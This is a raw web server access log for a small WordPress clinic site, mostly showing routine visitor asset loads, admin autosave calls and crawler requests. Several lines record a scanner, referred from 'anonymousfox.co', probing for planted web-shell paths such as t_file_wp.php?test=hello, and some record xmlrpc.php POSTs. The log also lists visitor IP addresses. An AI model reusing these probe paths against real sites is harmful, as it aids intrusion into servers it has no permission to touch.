172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2022/02/pic-2022.jpg HTTP/1.1" 404 88 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.9.5 HTTP/1.1" 200 11206 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2021/10/Oct-2021-website-ad.jpg HTTP/1.1" 200 37692 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2022/10/heatingpad-1.png HTTP/1.1" 200 20389 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2022/01/MCR-Acu-pic.png HTTP/1.1" 200 23193 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2022/10/pic.jpg HTTP/1.1" 200 61825 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:46 -0700] "GET /wp-content/uploads/2021/05/185300231_1124006634769468_196384368853979452_n.jpg HTTP/1.1" 200 146243 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:48 -0700] "GET /wp-content/uploads/2021/02/cropped-IMG_9103_1.14760356_std-2-192x192.jpg HTTP/1.1" 200 5530 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:48 -0700] "GET /wp-content/uploads/2021/02/cropped-IMG_9103_1.14760356_std-2-32x32.jpg HTTP/1.1" 200 1164 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
172.58.56.64 - - [03/Nov/2022:07:40:48 -0700] "GET /wp-content/themes/Divi/includes/builder/images/marker.png HTTP/1.1" 200 1940 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:40:46 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:40:50 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:42:46 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:42:50 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:43:55 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
66.249.66.141 - - [03/Nov/2022:07:44:03 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:44:51 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
116.255.178.218 - - [03/Nov/2022:07:45:47 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:45:56 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:46:51 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:47:56 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
66.249.66.137 - - [03/Nov/2022:07:48:12 -0700] "GET /ads.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.wellnessconceptsclinic.com"
66.249.66.200 - - [03/Nov/2022:07:48:23 -0700] "GET /ads.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:49:57 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:51:05 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:51:05 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 163 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:51:20 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:51:50 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
217.160.10.8 - - [03/Nov/2022:07:51:55 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:52:05 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:52:29 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:52:44 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:53:01 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:53:05 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
10.247.24.100 - - [03/Nov/2022:07:53:12 -0700] "GET / HTTP/1.1" 200 193032 "https://wellnessconceptsclinic.com/" "WordPress/5.9.5; https://wellnessconceptsclinic.com" "wellnessconceptsclinic.com"
10.247.24.100 - - [03/Nov/2022:07:53:06 -0700] "POST /wp-cron.php?doing_wp_cron=1667487186.2212030887603759765625 HTTP/1.1" 200 - "https://wellnessconceptsclinic.com/wp-cron.php?doing_wp_cron=1667487186.2212030887603759765625" "WordPress/5.9.5; https://wellnessconceptsclinic.com" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:53:17 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
10.247.24.100 - - [03/Nov/2022:07:53:17 -0700] "GET / HTTP/1.1" 200 185322 "https://wellnessconceptsclinic.com/" "WordPress/5.9.5; https://wellnessconceptsclinic.com" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:53:27 -0700] "GET /style.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:53:32 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:53:40 -0700] "GET /moduless.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:53:47 -0700] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:53:50 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:54:02 -0700] "GET /admin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:54:05 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:54:04 -0700] "GET /index.php?3x=3x HTTP/1.1" 301 - "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:54:06 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 416 "https://wellnessconceptsclinic.com/?et_fb=1&et_bfb=1&PageSpeed=off" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
85.31.46.140 - - [03/Nov/2022:07:54:12 -0700] "GET /?3x=3x HTTP/1.1" 200 185330 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "wellnessconceptsclinic.com"
65.118.108.130 - - [03/Nov/2022:07:54:53 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 98 "https://wellnessconceptsclinic.com/wp-admin/post.php?post=9&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:54:57 -0700] "GET / HTTP/1.1" 200 181197 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/uploads/wtfdivi/wp_head.css?ver=1620759003 HTTP/1.1" 200 441 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/bootstrap-front.css?ver=5.9.5 HTTP/1.1" 200 2640 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/animate.css?ver=5.9.5 HTTP/1.1" 200 4936 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/wp-facebook-reviews/public/css/wprev-fb-combine.css?ver=11.0 HTTP/1.1" 200 1859 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/tabs-responsive/assets/css/font-awesome/css/font-awesome.min.css?ver=5.9.5 HTTP/1.1" 200 4696 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprev-public_template1.css?ver=6.3 HTTP/1.1" 200 1198 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/z-url-preview/zurlplugin.css?ver=5.9.5 HTTP/1.1" 200 20 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprs_unslider.css?ver=6.3 HTTP/1.1" 200 533 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wprs_unslider-dots.css?ver=6.3 HTTP/1.1" 200 247 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/css/wpyelp_w3.css?ver=6.3 HTTP/1.1" 200 499 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:07 -0700] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1" 200 30908 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/et-cache/9/et-core-unified-deferred-9.min.css?ver=1666970668 HTTP/1.1" 200 774 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 4169 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/wp-facebook-reviews/public/js/wprs-unslider-min.js?ver=11.0 HTTP/1.1" 200 2349 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/js/wprev-public.js?ver=6.3 HTTP/1.1" 200 609 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/wp-facebook-reviews/public/js/wprev-public.js?ver=11.0 HTTP/1.1" 200 610 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/js/wprs-unslider-min.js?ver=6.3 HTTP/1.1" 200 2349 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/uploads/wtfdivi/wp_footer.js?ver=1620759003 HTTP/1.1" 200 183 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/tabs-responsive/assets/js/bootstrap.js?ver=5.9.5 HTTP/1.1" 200 20 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/tabs-responsive/assets/js/tabs-custom.js?ver=5.9.5 HTTP/1.1" 200 13700 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/divi-booster/core/icons/socicon/style.css?ver=3.9.9 HTTP/1.1" 200 2812 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/divi-booster/core/icons/socicon/fonts/Socicon.woff2?87visu HTTP/1.1" 200 64512 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/themes/Divi/core/admin/js/common.js?ver=4.18.0 HTTP/1.1" 200 566 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/plugins/divi-booster/core/icons/divi-booster-icons/icomoon/style.css?ver=3.9.9 HTTP/1.1" 200 453 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/themes/Divi/includes/builder/feature/dynamic-assets/assets/js/jquery.fitvids.js?ver=4.18.0 HTTP/1.1" 200 1341 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/themes/Divi/js/scripts.min.js?ver=4.18.0 HTTP/1.1" 200 70295 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/themes/Divi/core/admin/fonts/modules/all/modules.ttf HTTP/1.1" 200 92400 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wellness/wp-content/uploads/2018/11/Screen-Shot-2018-11-06-at-9.58.39-AM.png HTTP/1.1" 200 26036 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:08 -0700] "GET /wp-content/uploads/2022/02/pic-2022.jpg HTTP/1.1" 404 88 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2022/10/pic.jpg HTTP/1.1" 200 61825 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
69.71.12.248 - - [03/Nov/2022:07:55:09 -0700] "GET /wp-content/uploads/2021/10/Oct-2021-website-ad.jpg HTTP/1.1" 200 37692 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "wellnessconceptsclinic.com"
